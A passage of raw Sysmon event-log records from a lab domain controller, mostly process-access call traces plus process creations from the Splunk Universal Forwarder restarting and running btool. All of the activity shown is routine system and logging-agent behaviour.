DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003456Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.286{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003455Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.286{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4322-6000-AE00-000000009A01}5028C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003454Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.286{08A6967A-4322-6000-AD00-000000009A01}51045084C:\Windows\system32\cmd.exe{08A6967A-4322-6000-AE00-000000009A01}5028C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003453Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.300{08A6967A-4322-6000-AE00-000000009A01}5028C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{08A6967A-4322-6000-AD00-000000009A01}5104C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 10341000x80000000000000003452Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.286{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-4322-6000-AD00-000000009A01}5104C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003451Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.286{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003450Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.286{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003449Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.286{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003448Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.286{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003447Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.286{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003446Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.286{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003445Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.286{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003444Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.286{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003443Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.286{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003442Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.286{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4322-6000-AD00-000000009A01}5104C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003441Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.286{08A6967A-4321-6000-A600-000000009A01}4240748C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{08A6967A-4322-6000-AD00-000000009A01}5104C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+14ab4|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d8a0|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003440Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.293{08A6967A-4322-6000-AD00-000000009A01}5104C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4321-6000-A600-000000009A01}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2316 10341000x80000000000000003439Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.255{08A6967A-4322-6000-AC00-000000009A01}41764252C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003438Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.005{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-4322-6000-AC00-000000009A01}4176C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003437Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.005{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003436Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.005{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003435Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.005{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003434Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.005{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003433Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.005{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003432Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.005{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003431Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.005{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003430Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.005{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4322-6000-AC00-000000009A01}4176C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003429Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:02.005{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003428Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 